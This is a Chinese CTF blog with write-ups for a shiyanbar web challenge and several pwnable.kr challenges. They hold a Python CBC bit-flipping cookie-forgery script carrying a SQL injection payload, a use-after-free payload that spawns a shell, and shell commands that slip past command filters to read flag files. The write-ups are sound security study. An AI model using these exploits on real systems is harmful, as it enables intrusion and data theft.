实验吧-简单的登录题

发表于 2018-02-09 | 更新于 2018-08-05 | 分类于 CTF | 评论数：

前言

这是在实验吧上面的一道web题。主要考察cbc字节反转攻击。

分析

题目开始就是输入id去登录

首先想到的就是sql注入了，输入1'后页面显示Hello，重新载入的话页面返回报错信息

确实存在注入，看那后面的逗号，猜测注入点在limit后面。然后试了很多，发现题目把union,#，procedure等都过滤了，暂时没想到任何绕过的方法。然后抓包看看消息头看看有没有提示

提示存在test.php文件，访问后是php源码，接下来就是源码分析了

<?php
define("SECRET_KEY", '***********');
define("METHOD", "aes-128-cbc");
error_reporting(0);
include('conn.php');
function sqliCheck($str){
	if(preg_match("/\\\|,|-|#|=|~|union|like|procedure/i",$str)){
		return 1;
	}
	return 0;
}
function get_random_iv(){
    $random_iv='';
    for($i=0;$i<16;$i++){
        $random_iv.=chr(rand(1,255));
    }
    return $random_iv;
}
function login($info){
	$iv = get_random_iv();
	$plain = serialize($info);
    $cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);
    setcookie("iv", base64_encode($iv));
    setcookie("cipher", base64_encode($cipher));
}
function show_homepage(){
	global $link;
    if(isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])){
        $cipher = base64_decode($_COOKIE['cipher']);
        $iv = base64_decode($_COOKIE["iv"]);
        if($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)){
            $info = unserialize($plain) or die("<p>base64_decode('".base64_encode($plain)."') can't unserialize</p>");
            $sql="select * from users limit ".$info['id'].",0";
            $result=mysqli_query($link,$sql);
            
            if(mysqli_num_rows($result)>0  or die(mysqli_error($link))){
            	$rows=mysqli_fetch_array($result);
				echo '<h1><center>Hello!'.$rows['username'].'</center></h1>';
			}
			else{
				echo '<h1><center>Hello!</center></h1>';
			}
        }else{
            die("ERROR!");
        }
    }
}
if(isset($_POST['id'])){
    $id = (string)$_POST['id'];
    if(sqliCheck($id))
		die("<h1 style='color:red'><center>sql inject detected!</center></h1>");
    $info = array('id'=>$id);
    login($info);
    echo '<h1><center>Hello!</center></h1>';
}else{
    if(isset($_COOKIE["iv"])&&isset($_COOKIE['cipher'])){
        show_homepage();
    }else{
        echo '<body class="login-body" style="margin:0 auto">
                <div id="wrapper" style="margin:0 auto;width:800px;">
                    <form name="login-form" class="login-form" action="" method="post">
                        <div class="header">
                        <h1>Login Form</h1>
                        <span>input id to login</span>
                        </div>
                        <div class="content">
                        <input name="id" type="text" class="input id" value="id" onfocus="this.value=\'\'" />
                        </div>
                        <div class="footer">
                        <p><input type="submit" name="submit" value="Login" class="button" /></p>
                        </div>
                    </form>
                </div>
            </body>';
    }
}

分析整个代码可以发现，通过post的id值由于被sqliCheck函数过滤了关键字无法在此处注入。另一处可注入的点在sql语句拼接的时候，在这里代码把解序列化后的数据直接拼接进sql语句中，如果可以控制此处的数据那么就可以造成注入。
那该如何控制这里的数据呢？可以发现，程序使用了aes-128-cbc的加密算法来加密和解密，而这种算法是存在字节反转攻击的，再配合程序在解序列化失败后返回解密后的明文，我们就可以控制密文来得到我们想要的任意明文，从而控制sql语句。对于cbc字节反转攻击的利用方法和原理网上有很多，抽时间自己也总结一下。下面是我的exp

import requests,base64,urllib,math

def work():
    url = 'http://ctf5.shiyanbar.com/web/jiandan/index.php'
    payload = '0 union select 1,value,3 from you_want limit 1#'  
    #payload = 'x'*20
    
    plaintext = 'a:1:{s:2:"id";s:%d:"%s";}'%(len(payload),payload)
    badText = 'x'*16
    if len(plaintext)%16:
        if len(plaintext)%16>3:
            badText = 'x'*(len(plaintext)%16-3)+'";}'
        elif len(plaintext)%16 == 3:
            badText = '";}'
        elif len(plaintext)%16 == 1:
            badText = '}'
        else:
            badText = ';}'
    r = requests.post(url,data={'id':'x'*len(payload)})
    sc = r.headers['Set-Cookie'].split(',')
    
    iv = 'a'*16
    cipher = sc[1][sc[1].find('=')+1:]
    blockNum = len(cipher)/16
    cipher = base64.b64decode(urllib.unquote(cipher))
    blockNum = len(cipher)/16
    cipherBlock = [iv]
    cipherBlock += [cipher[16*i:16*(i+1)] for i in xrange(blockNum)]
    plainBlock = [plaintext[16*i:16*(i+1)] for i in xrange(blockNum)]
    
    for i in xrange(blockNum-1,-1,-1):
        s1 = plainBlock[i]
        s2 = cipherBlock[i]
        tmp = ''
        
        for j in xrange(len(s1)):
            tmp += chr(ord(s1[j])^ord(badText[j])^ord(s2[j]))

        cipherBlock[i]=tmp+s2[len(tmp):]
        if i == 0:
            iv = cipherBlock[0]

        iv_new = urllib.quote(base64.b64encode(iv))
        cipher_new = urllib.quote(base64.b64encode(''.join(cipherBlock[1:])))
        headers={'Cookie':'iv={};cipher={}'.format(iv_new,cipher_new)}

        r = requests.get(url,headers=headers)

        if i != 0: 
            tmp = r.text[r.text.find('decode')+8:r.text.rfind("')")]
            badText = base64.b64decode(tmp)[16*(i-1):16*i]
        else:
            print r.text.encode('gb18030')
        

work()

最后通过控制exp中的payload来注入sql语句，读取flag

C:\Users\gyh\Desktop>python 1.py
??????<h1><center>Hello!flag{c42b2b758a5a36228156d9d671c37f19}</center></h1>

C:\Users\gyh\Desktop>

总结

这道题主要考察cbc字节反转攻击，再结合本题在解序列化失败后返回解密的明文的特定的情况，可以控制整个明文字符串。但是当时没注意本题的这种特定情况导致我浪费了很多时间，看来细心很重要啊。

pwnable.kr-codemap

发表于 2018-02-07 | 更新于 2018-08-04 | 分类于 CTF | 评论数：

前言

这道题当时理解了逻辑，但是不知道怎么编写调试用的自动化脚本还是参考了别人的写的代码。

分析

ssh连上去后无法读源码，需要逆向codemap.exe。读取readme文件

1
2
3

codemap@ubuntu:~$ cat readme
reverse engineer the 'codemap.exe' binary, then connect to codemap daemon(nc 0 9021),
the daemon will ask you some question, provide the correct answer to get flag.

nc连上去后要求输入第二和第三大堆块里面的字符串，开始以为问题是随机的，试了几次确定只问了这两个堆块。那么getflag关键就是逆向codemap.exe，下面给出ida反编译的代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // esi@3
  int (***v4)(void); // eax@3
  int (***v5)(void); // edi@3
  int v6; // esi@4
  int (**v7)(void); // eax@4
  int (***v8)(void); // ecx@5
  unsigned int v9; // eax@8
  unsigned int v10; // esi@8
  char *v11; // ebx@8
  unsigned int v12; // esi@9
  char *v14; // [sp+10h] [bp-60h]@0
  unsigned int v15; // [sp+14h] [bp-5Ch]@8
  unsigned int v16; // [sp+18h] [bp-58h]@1
  unsigned int v17; // [sp+1Ch] [bp-54h]@1
  char v18; // [sp+20h] [bp-50h]@9
  int v19; // [sp+6Ch] [bp-4h]@3

  printf("I will make 1000 heap chunks with random size\n");
  printf("each heap chunk has a random string\n");
  printf("press enter to start the memory allocation\n");
  sub_4040B1();
  v17 = 0;
  v16 = 0;
  srand(0);
  while ( 1 )
  {
    v3 = 10000 * rand() % 1337;
    v4 = (int (***)(void))operator new(8u);
    v5 = v4;
    v19 = 0;
    if ( v4 )
    {
      *v4 = (int (**)(void))&off_40F2EC;
      v6 = (10000 * v3 >> 1) + 123;
      v7 = (int (**)(void))operator new(8u);
      if ( v7 )
      {
        v7[1] = (int (*)(void))v6;
        v5[1] = v7;
        v8 = v5;
      }
      else
      {
        v5[1] = 0;
        v8 = v5;
      }
    }
    else
    {
      v8 = 0;
    }
    v19 = -1;
    v9 = (**v8)();
    v10 = v9 % 0x186A0;
    v15 = v9 % 0x186A0;
    v11 = (char *)malloc(v9 % 0x186A0);
    if ( v10 >= 0x10 )
    {
      qmemcpy(&v18, "abcdefghijklmnopqrstubwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890", 0x3Fu);
      v12 = 0;
      do
        v11[++v12 - 1] = *(&v18 + rand() % 62);
      while ( v12 < 0xF );
      v11[15] = 0;
      if ( v15 > v17 )
      {
        v17 = v15;
        v14 = v11;
      }
    }
    if ( ++v16 >= 0x3E8 )
      break;
    srand(v16);
  }
  printf("the allcated memory size of biggest chunk is %d byte\n", v17);
  printf("the string inside that chunk is %s\n", v14);
  printf("log in to pwnable.kr and anwer some question to get flag.\n");
  sub_4040B1();
  return 0;
}

程序大致逻辑是随机生成1000个堆块，并且每个堆块中会存放随机的字符串，最后输出最大的堆块大小和里面的字符串。可以发现程序使用的srand函数的种子都是固定值，那么在使用rand函数的时候就不是真正的随机，所以堆块的大小和字符串都是固定的。
按照题目要求，需要给1000个堆块排序找到第二和第三大堆块，这里需要知道每次循环中堆块的大小和字符串存在哪。根据题目提示在0x403E65处下断点并观察ebx,eax可以发现ebx存储的是该堆块的字符串，eax存储的是堆块的大小。
但是要获取题目所要的字符串在1000个堆块中找，手找是不可能的，只能用自动化代码。
以前看过《Python灰帽子》里面讲的有，但是没好好读现在也没啥印象了，参考这篇writeup的代码用idapython写的

#coding:utf-8
import idc
from idaapi import *

max_eax = 0
second_eax = 0
third_eax = 0
max_ebx = 0
second_ebx = 0
third_ebx = 0
ft=0
sd=0
td=0
#AddBpt(0x263E65).text:00403E65（在这一句下断点）jbe     short loc_403E6D
#在题目提示的地方前下一个断点。
StartDebugger("","","")#启动具有默认参数的调试器

for count in xrange(999): 
    code = GetDebuggerEvent(WFNE_SUSP|WFNE_CONT, -1) # 恢复执行，等待断点
    eax = GetRegValue("EAX")
    ebx = GetRegValue("EBX")

    if max_eax < eax :
        td=sd
        sd=ft
        ft=count
        third_eax = second_eax
        third_ebx = second_ebx
        second_eax = max_eax
        second_ebx = max_ebx
        max_eax = eax;  
        max_ebx = ebx;  
    elif second_eax < eax :
        td=sd
        sd=count
        third_eax = second_eax
        third_ebx = second_ebx
        second_eax = eax
        second_ebx = ebx
    elif third_eax < eax:
        td=count
        third_eax = eax
        third_ebx = ebx
Message("max eax: %d, ebx: %x, count %d, second eax: %d, ebx: %x, count %d, third eax: %d, ebx: %x, count %d\n" % (max_eax, max_ebx, ft, second_eax, second_ebx, sd, third_eax, third_ebx, td))

最后输出

1
2
3

max eax: 99879, ebx: 2aa3108, str: X12nM7yCJcu0x5u, count 546,
second eax: 99679, ebx: 1e22658, str: roKBkoIZGMUKrMb, count 290, 
third eax: 99662, ebx: 2ec5b40, str: 2ckbnDUabcsMA2s, count 629

回答问题成功getflag

codemap@ubuntu:~$ nc 0 9021
What is the string inside 2nd biggest chunk? :
roKBkoIZGMUKrMb
Wait for 10 seconds to prevent brute-forcing...
What is the string inside 3rd biggest chunk? :
2ckbnDUabcsMA2s
Wait for 10 seconds to prevent brute-forcing...
Congratz! flag : select_eax_from_trace_order_by_eax_desc_limit_20
codemap@ubuntu:~$

总结

做了这道题我准备去好好在读一遍《Python灰帽子》。

pwnable.kr-uaf

发表于 2018-01-29 | 更新于 2018-08-04 | 分类于 CTF | 评论数：

前言

这道题有了pwn的味道了，自己虽然以前学习过二进制漏洞方面的知识但是都是windows方面的（还是新手），对于linux系统下的安全机制和一些关键的技术仍然不熟悉，做这道题参考了别人的writeup，这篇writeup很详细，对我这样的新手来说很友好。

分析

先分析源码uaf.c

#include <fcntl.h>
#include <iostream> 
#include <cstring>
#include <cstdlib>
#include <unistd.h>
using namespace std;

class Human{
private:
	virtual void give_shell(){
		system("/bin/sh");
	}
protected:
	int age;
	string name;
public:
	virtual void introduce(){
		cout << "My name is " << name << endl;
		cout << "I am " << age << " years old" << endl;
	}
};

class Man: public Human{
public:
	Man(string name, int age){
		this->name = name;
		this->age = age;
        }
        virtual void introduce(){
		Human::introduce();
                cout << "I am a nice guy!" << endl;
        }
};

class Woman: public Human{
public:
        Woman(string name, int age){
                this->name = name;
                this->age = age;
        }
        virtual void introduce(){
                Human::introduce();
                cout << "I am a cute girl!" << endl;
        }
};

int main(int argc, char* argv[]){
	Human* m = new Man("Jack", 25);
	Human* w = new Woman("Jill", 21);

	size_t len;
	char* data;
	unsigned int op;
	while(1){
		cout << "1. use\n2. after\n3. free\n";
		cin >> op;

		switch(op){
			case 1:
				m->introduce();
				w->introduce();
				break;
			case 2:
				len = atoi(argv[1]);
				data = new char[len];
				read(open(argv[2], O_RDONLY), data, len);
				cout << "your data is allocated" << endl;
				break;
			case 3:
				delete m;
				delete w;
				break;
			default:
				break;
		}
	}

	return 0;	
}

整个逻辑简短分析。这是一个c++程序，定义了一个基类Human和继承的两个子类Woman,Man。其中关键的部分是基类中定义了两个虚函数get_shell,introduce。main函数中先是定义了两个子类的对象，然后循环结构中有3个case，第一个分别调用了introduce函数，第二个分配一个用户指定大小的的内存并向里面写入用户指定的数据，第三个执行前面两个对象的销毁。
逻辑清楚了，漏洞在哪呢？根据题目提示，这存在一个uaf漏洞。

知识点

UAF是Use-After-Free的缩写，也就是释放后重用漏洞。UAF漏洞的成因是一块堆内存被释放了之后又被使用。又被使用指的是：指针存在（“野”指针被引用）。这个引用的结果是不可预测的，因为不知道会发生什么。由于大多数的堆内存其实都是C++对象，所以利用的核心思路就是分配堆去占坑，占的坑中有自己构造的虚表。
uaf漏洞是一种内存破坏漏洞存在于各种操作系统中。对于本题来说，还要了解的技术如下

linux内存分配和释放策略
c++对象内存布局

对于这些参考搜索引擎即可，我找时间好好学习并总结一下（可以参考上面推荐的writeup）。

利用

了解了关键的技术接下来就是漏洞的利用。分析程序发现，只要先执行第三个case使对象释放，然后再重新申请同样大小的内存，那么根据linux内存的分配策略原先释放掉的对象内存就会被重新分配，这时再执行第一个case就会使用“野”指针执行虚函数调用。然而“野”指针指向的内存是由我控制的，于是就达到了利用的目的。然而本题由于有两个对象，且对象调用函数的顺序和内存先释放后分配的事实导致利用有些许改变，应该保证第一个对象（m）的函数调用不会引起异常，所以向内存中写入的数据以第一个对象为准。
利用流程就是case3->case2-case2->case1。利用思路就是改变虚表指针的值，使其指向虚表的前8个字节（因为get_shell是虚表中第一个函数，且题目系统是64位），从而使对象在调用introduce时调用get_shell而获得shell。所以getflag的关键就是找类Man的虚表。

.rodata:0000000000401550 off_401550      dq offset _ZN5Human10give_shellEv
.rodata:0000000000401550                                         ; DATA XREF: Woman::Woman(std::string,int)+24o
.rodata:0000000000401550                                         ; Human::give_shell(void)
.rodata:0000000000401558                 dq offset _ZN5Woman9introduceEv ; Woman::introduce(void)
.rodata:0000000000401560                 public _ZTV3Man ; weak
.rodata:0000000000401560 ; `vtable for'Man
.rodata:0000000000401560 _ZTV3Man        db    0
.rodata:0000000000401561                 db    0
.rodata:0000000000401562                 db    0
.rodata:0000000000401563                 db    0
.rodata:0000000000401564                 db    0
.rodata:0000000000401565                 db    0
.rodata:0000000000401566                 db    0
.rodata:0000000000401567                 db    0
.rodata:0000000000401568                 db 0D0h ; 
.rodata:0000000000401569                 db  15h
.rodata:000000000040156A                 db  40h ; @
.rodata:000000000040156B                 db    0
.rodata:000000000040156C                 db    0
.rodata:000000000040156D                 db    0
.rodata:000000000040156E                 db    0
.rodata:000000000040156F                 db    0
.rodata:0000000000401570 off_401570      dq offset _ZN5Human10give_shellEv
.rodata:0000000000401570                                         ; DATA XREF: Man::Man(std::string,int)+24o
.rodata:0000000000401570                                         ; Human::give_shell(void)
.rodata:0000000000401578                 dq offset _ZN3Man9introduceEv ; Man::introduce(void)
.rodata:0000000000401580                 public _ZTV5Human ; weak
.rodata:0000000000401580 ; `vtable for'Human
.rodata:0000000000401580 _ZTV5Human      db    0

在ida中可以发现Man类的虚表地址是0x401550，然后就有了下面的利用过程

uaf@ubuntu:~$ python -c "print '\x48\x15\x40'+'\x00'*21" >/tmp/poc
uaf@ubuntu:~$ ./uaf 24 /tmp/poc
1. use
2. after
3. free
3
1. use
2. after
3. free
2
your data is allocated
1. use
2. after
3. free
2
your data is allocated
1. use
2. after
3. free
1
$ cat flag
yay_f1ag_aft3r_pwning
$

总结

感觉做这道题有了pwn的感觉了，学到了很多linux内存管理方面的东西，同时也专门去了解了uaf漏洞的东西，收货很大。

pwnable.kr-cmd2

发表于 2018-01-28 | 更新于 2018-08-04 | 分类于 CTF | 评论数：

前言

这和上一道题pwnable.kr-cmd1相似，不过提升了难度，但总体还是很简单，适合我这样的新手。

分析

贴出cmd2.c的源码

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
	int r=0;
	r += strstr(cmd, "=")!=0;
	r += strstr(cmd, "PATH")!=0;
	r += strstr(cmd, "export")!=0;
	r += strstr(cmd, "/")!=0;
	r += strstr(cmd, "`")!=0;
	r += strstr(cmd, "flag")!=0;
	return r;
}

extern char** environ;
void delete_env(){
	char** p;
	for(p=environ; *p; p++)	memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
	delete_env();
	putenv("PATH=/no_command_execution_until_you_become_a_hacker");
	if(filter(argv[1])) return 0;
	printf("%s\n", argv[1]);
	system( argv[1] );
	return 0;
}

整个程序和上一道题逻辑类似。程序首先就把传入的环境变量全部删除，然后重新定义PATH变量，接着进行关键字检查，最后执行传入的第一个参数。要想突破障碍getflag首先得清楚障碍是什么？

环境变量被删除。
这将使得无法通过环境变量来带入命令执行。
PATH变量被乱写
这将无法直接执行外部命令。
filter函数关键字检查黑名单
这个函数还是使用黑名单，但是把关键的字符和字符串都过滤了。无法使用绝对路径，无法重写PATH变量。
那么程序就没有弱点了吗？还是有的。
程序可以执行内部命令
filter函数使用黑名单，存在绕过可能。
于是就有了下面的思路。我可以执行read命令写入一个环境变量，然后执行这个环境变量即可。
1
2
3
4
5
cmd2@ubuntu:~$ ./cmd2 "read a;\$a"
read a;$a
/bin/cat /home/cmd2/flag
FuN_w1th_5h3ll_v4riabl3s_haha
cmd2@ubuntu:~$

知识点

read命令从键盘读取变量的值，通常用在shell脚本中与用户进行交互的场合。该命令可以一次读取多个变量的值，变量和输入的值都需要使用空格隔开。在read命令后面，如果没有指定变量名，读取的数据将被自动赋值给特定的变量REPLY 。

总结

这道题在掌握了linux命令的情况下也还是挺简单的，对于我这样的新手来说还是学到了不少东西，对命令的使用也更深刻。

pwnable.kr-cmd1

发表于 2018-01-28 | 更新于 2018-08-04 | 分类于 CTF | 评论数：

前言

还是很有趣的题目，不过很基础，很适合我这样的新手。

分析

还是先贴源码cmd1.c

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
	int r=0;
	r += strstr(cmd, "flag")!=0;
	r += strstr(cmd, "sh")!=0;
	r += strstr(cmd, "tmp")!=0;
	return r;
}
int main(int argc, char* argv[], char** envp){
	putenv("PATH=/fuckyouverymuch");
	if(filter(argv[1])) return 0;
	system( argv[1] );
	return 0;
}

程序开头就把环境变量PATH置为/fuckyouverymuch，然后检查了第一个传入参数，通过验证后直接执行第一个参数。
但是等等，开头就开始骂人了？这能忍？老子上去就是环境变量绕过关键字检查，不用你帮老子找cat程序在哪，老子知道它在/bin/目录下面，于是就有了下面的exp

cmd1@ubuntu:~$ export a="/bin/cat /home/cmd1/flag"
cmd1@ubuntu:~$ $a
/bin/cat: /home/cmd1/flag: Permission denied
cmd1@ubuntu:~$ ./cmd1 "\$a"
mommy now I get what PATH environment is for :)
cmd1@ubuntu:~$

平复一下心情，来细细讲一下为什么。程序getflag的第一步就是绕过filter函数的检查，这很好办直接用环境变量就可以了。
第二步，由于程序修改了PATH变量，导致执行system函数时无法找到外部命令，只能执行内部命令，这也很好办使用绝对路径就可以了。解决代码就是上面的。

总结

还是很简单的一道题，但是也还是很有趣。

pwnablr.kr-lotto

发表于 2018-01-26 | 更新于 2018-08-04 | 分类于 CTF | 评论数：

前言

又是一道很简单的源码阅读题目，考察思路。

分析

还是先分析源码

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>

unsigned char submit[6];

void play(){
	
	int i;
	printf("Submit your 6 lotto bytes : ");
	fflush(stdout);

	int r;
	r = read(0, submit, 6);

	printf("Lotto Start!\n");
	//sleep(1);

	// generate lotto numbers
	int fd = open("/dev/urandom", O_RDONLY);
	if(fd==-1){
		printf("error. tell admin\n");
		exit(-1);
	}
	unsigned char lotto[6];
	if(read(fd, lotto, 6) != 6){
		printf("error2. tell admin\n");
		exit(-1);
	}
	for(i=0; i<6; i++){
		lotto[i] = (lotto[i] % 45) + 1;		// 1 ~ 45
	}
	close(fd);
	
	// calculate lotto score
	int match = 0, j = 0;
	for(i=0; i<6; i++){
		for(j=0; j<6; j++){
			if(lotto[i] == submit[j]){
				match++;
			}
		}
	}

	// win!
	if(match == 6){
		system("/bin/cat flag");
	}
	else{
		printf("bad luck...\n");
	}

}

void help(){
	printf("- nLotto Rule -\n");
	printf("nlotto is consisted with 6 random natural numbers less than 46\n");
	printf("your goal is to match lotto numbers as many as you can\n");
	printf("if you win lottery for *1st place*, you will get reward\n");
	printf("for more details, follow the link below\n");
	printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");
	printf("mathematical chance to win this game is known to be 1/8145060.\n");
}

int main(int argc, char* argv[]){

	// menu
	unsigned int menu;

	while(1){

		printf("- Select Menu -\n");
		printf("1. Play Lotto\n");
		printf("2. Help\n");
		printf("3. Exit\n");

		scanf("%d", &menu);

		switch(menu){
			case 1:
				play();
				break;
			case 2:
				help();
				break;
			case 3:
				printf("bye\n");
				return 0;
			default:
				printf("invalid menu\n");
				break;
		}
	}
	return 0;
}

分析游戏的主逻辑，大致就是从标准输入读取6个字节，然后程序通过读取/dev/urandom（这是一个linux下的伪随机设备）并进行一些运算生成了6个在1到45之间的随机数。最后随机数的每一个字节都与提交的6个字节进行比较，相等match就加1，如果最终match等于6就getflag。
漏洞还是很容易看出来的，如果提交的6个字节相等并且在1到45之间，那么就有6/45的概率getflag。这个概率还是很大的。可以手动，可以自动。下面贴出自动的代码（记得上传到/tmp目录下）

# coding=utf-8

import subprocess as sp
import time
import threading

text = 'bad luck...\n'
def work(s):
    global text
    while True:
        t = s.stdout.readline()
        if not t:
            break
        text += t
    
    

def main():
    global text
    num = 0
    s = sp.Popen('/home/lotto/lotto',stdin=sp.PIPE,stdout=sp.PIPE,cwd='/home/lotto/')
    th = threading.Thread(target=work,args=(s,))
    th.start()
    last = ''
    while True:
        s.stdin.write('1\n')
        time.sleep(0.1)
        s.stdin.write(' '*6)
        time.sleep(0.1)
        num += 1
        
        #print text

        if 'bad luck...' not in text:
            print 'you try {} times!\n'.format(num-1)
            print last
            break
        last = text
        text = ''
    
    s.kill()
    
main()

结果

lotto@ubuntu:/tmp$ python 1.py
you try 19 times!

Submit your 6 lotto bytes : Lotto Start!
bad luck...
- Select Menu -
1. Play Lotto
2. Help
3. Exit
Submit your 6 lotto bytes : sorry mom... I FORGOT to check duplicate numbers... :(

lotto@ubuntu:/tmp$

总结

思路很简单，写代码的时候遇到了一点小问题，主要是需要熟练python的subprocess模块的使用。但其实我首先手动的试了一下，一遍就过了，哈哈。人品爆发，不写了，买彩票去了。

pwnable.kr-blackjack

发表于 2018-01-26 | 更新于 2018-08-04 | 分类于 CTF | 评论数：

前言

21点是一个很流行的卡牌游戏，网上可以找到它的规则的详细描述。这道题游戏规则类似，但是简化了。
这道题其实是源码审计的题目很简单，不过当时由于受前面一道题的影响，我一度要写个算法来赢下游戏，浪费了不少时间（最后还是没写出来）。

分析

是的思路要正确，既然题目都给出了源代码的地址，何不直接看源码？

/ Programmer: Vladislav Shulman
// Final Project
// Blackjack
 
// Feel free to use any and all parts of this program and claim it as your own work
 
//FINAL DRAFT
 
#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <time.h>                //Used for srand((unsigned) time(NULL)) command
#include <process.h>             //Used for system("cls") command
 
#define spade 06                 //Used to print spade symbol
#define club 05                  //Used to print club symbol
#define diamond 04               //Used to print diamond symbol
#define heart 03                 //Used to print heart symbol
#define RESULTS "Blackjack.txt"  //File name is Blackjack
 
//Global Variables
int k;
int l;
int d;
int won;
int loss;
int cash = 500;
int bet;
int random_card;
int player_total=0;
int dealer_total;
 
//Function Prototypes
int clubcard();      //Displays Club Card Image
int diamondcard();   //Displays Diamond Card Image
int heartcard();     //Displays Heart Card Image
int spadecard();     //Displays Spade Card Image
int randcard();      //Generates random card
int betting();       //Asks user amount to bet
void asktitle();     //Asks user to continue
void rules();        //Prints "Rules of Vlad's Blackjack" menu
void play();         //Plays game
void dealer();       //Function to play for dealer AI
void stay();         //Function for when user selects 'Stay'
void cash_test();    //Test for if user has cash remaining in purse
void askover();      //Asks if user wants to continue playing
void fileresults();  //Prints results into Blackjack.txt file in program directory
 
//Main Function
int main(void)
{
    int choice1;
    printf("\n");
    printf("\n");
    printf("\n");
    printf("\n              222                111                            ");
    printf("\n            222 222            11111                              ");
    printf("\n           222   222          11 111                            "); 
    printf("\n                222              111                               "); 
    printf("\n               222               111                           ");   
    printf("\n");
    printf("\n%c%c%c%c%c     %c%c            %c%c         %c%c%c%c%c    %c    %c                ", club, club, club, club, club, spade, spade, diamond, diamond, heart, heart, heart, heart, heart, club, club);  
    printf("\n%c    %c    %c%c           %c  %c       %c     %c   %c   %c              ", club, club, spade, spade, diamond, diamond, heart, heart, club, club);            
    printf("\n%c    %c    %c%c          %c    %c     %c          %c  %c               ", club, club, spade, spade, diamond, diamond, heart, club, club);                        
    printf("\n%c%c%c%c%c     %c%c          %c %c%c %c     %c          %c %c              ", club, club, club, club, club, spade, spade, diamond, diamond, diamond, diamond, heart, club, club);      
    printf("\n%c    %c    %c%c         %c %c%c%c%c %c    %c          %c%c %c             ", club, club, spade, spade, diamond, diamond, diamond, diamond, diamond, diamond, heart, club, club, club);                       
    printf("\n%c     %c   %c%c         %c      %c    %c          %c   %c               ", club, club, spade, spade, diamond, diamond, heart, club, club);                                         
    printf("\n%c     %c   %c%c        %c        %c    %c     %c   %c    %c             ", club, club, spade, spade, diamond, diamond, heart, heart, club, club);                                                            
    printf("\n%c%c%c%c%c%c    %c%c%c%c%c%c%c   %c        %c     %c%c%c%c%c    %c     %c            ", club, club, club, club, club, club, spade, spade, spade, spade, spade, spade, spade, diamond, diamond, heart, heart, heart, heart, heart, club, club);                                                                                     
    printf("\n");     
    printf("\n                        21                                   ");
     
    printf("\n     %c%c%c%c%c%c%c%c      %c%c         %c%c%c%c%c    %c    %c                ", diamond, diamond, diamond, diamond, diamond, diamond, diamond, diamond, heart, heart, club, club, club, club, club, spade, spade);                     
    printf("\n        %c%c        %c  %c       %c     %c   %c   %c              ", diamond, diamond, heart, heart, club, club, spade, spade);                                      
    printf("\n        %c%c       %c    %c     %c          %c  %c               ", diamond, diamond, heart, heart, club, spade, spade);                                           
    printf("\n        %c%c       %c %c%c %c     %c          %c %c              ", diamond, diamond, heart, heart, heart, heart, club, spade, spade);                                     
    printf("\n        %c%c      %c %c%c%c%c %c    %c          %c%c %c             ", diamond, diamond, heart, heart, heart, heart, heart, heart, club, spade, spade, spade);                                                
    printf("\n        %c%c      %c      %c    %c          %c   %c               ", diamond, diamond, heart, heart, club, spade, spade);                                                                               
    printf("\n     %c  %c%c     %c        %c    %c     %c   %c    %c             ", diamond, diamond, diamond, heart, heart, club, spade, spade);                                                                                                               
    printf("\n      %c%c%c      %c        %c     %c%c%c%c%c    %c     %c            ", diamond, diamond, diamond, heart, heart, club, club, club, club, club, spade, spade);                                                                                                                                        
    printf("\n");  
    printf("\n         222                     111                         ");
    printf("\n        222                      111                         ");
    printf("\n       222                       111                         ");
    printf("\n      222222222222222      111111111111111                       ");
    printf("\n      2222222222222222    11111111111111111                         ");
    printf("\n");
    printf("\n");
     
    asktitle();
     
    printf("\n");
    printf("\n");
    system("pause");
    return(0);
} //end program
 
void asktitle() // Function for asking player if they want to continue
{
    char choice1;
    int choice2;
     
     printf("\n                 Are You Ready?");
     printf("\n                ----------------");
     printf("\n                      (Y/N)\n                        ");
     scanf("\n%c",&choice1);
 
    while((choice1!='Y') && (choice1!='y') && (choice1!='N') && (choice1!='n')) // If invalid choice entered
    {                                                                           
        printf("\n");
        printf("Incorrect Choice. Please Enter Y for Yes or N for No.\n");
        scanf("%c",&choice1);
    }
 
 
    if((choice1 == 'Y') || (choice1 == 'y')) // If yes, continue. Prints menu.
    { 
            system("cls");
            printf("\nEnter 1 to Begin the Greatest Game Ever Played.");
            printf("\nEnter 2 to See a Complete Listing of Rules.");
            printf("\nEnter 3 to Exit Game. (Not Recommended)");
            printf("\nChoice: ");
            scanf("%d", &choice2); // Prompts user for choice
            if((choice2<1) || (choice2>3)) // If invalid choice entered
            {
                printf("\nIncorrect Choice. Please enter 1, 2 or 3\n");
                scanf("%d", &choice2);
            }
            switch(choice2) // Switch case for different choices
            {   
                case 1: // Case to begin game
                   system("cls");
                    
                   play();
                                       
                   break;
                    
                case 2: // Case to see rules
                   system("cls");
                   rules();
                   break;
                    
                case 3: // Case to exit game
                   printf("\nYour day could have been perfect.");
                   printf("\nHave an almost perfect day!\n\n");
                   system("pause");
                   exit(0);
                   break;
                    
                default:
                   printf("\nInvalid Input");
            } // End switch case
    } // End if loop
    
             
 
    else if((choice1 == 'N') || (choice1 == 'n')) // If no, exit program
    {
        printf("\nYour day could have been perfect.");
        printf("\nHave an almost perfect day!\n\n");
        system("pause");
        exit(0);
    }
     
    return;
} // End function
 
void rules() //Prints "Rules of Vlad's Blackjack" list
{
     char choice1;
     int choice2;
      
     printf("\n           RULES of VLAD's BLACKJACK");
     printf("\n          ---------------------------");
     printf("\nI.");
     printf("\n     Thou shalt not question the odds of this game.");
     printf("\n      %c This program generates cards at random.", spade);
     printf("\n      %c If you keep losing, you are very unlucky!\n", diamond);
      
     printf("\nII.");
     printf("\n     Each card has a value.");
     printf("\n      %c Number cards 1 to 10 hold a value of their number.", spade);
     printf("\n      %c J, Q, and K cards hold a value of 10.", diamond);
     printf("\n      %c Ace cards hold a value of 11", club);
     printf("\n     The goal of this game is to reach a card value total of 21.\n");
      
     printf("\nIII.");
     printf("\n     After the dealing of the first two cards, YOU must decide whether to HIT or STAY.");
     printf("\n      %c Staying will keep you safe, hitting will add a card.", spade);
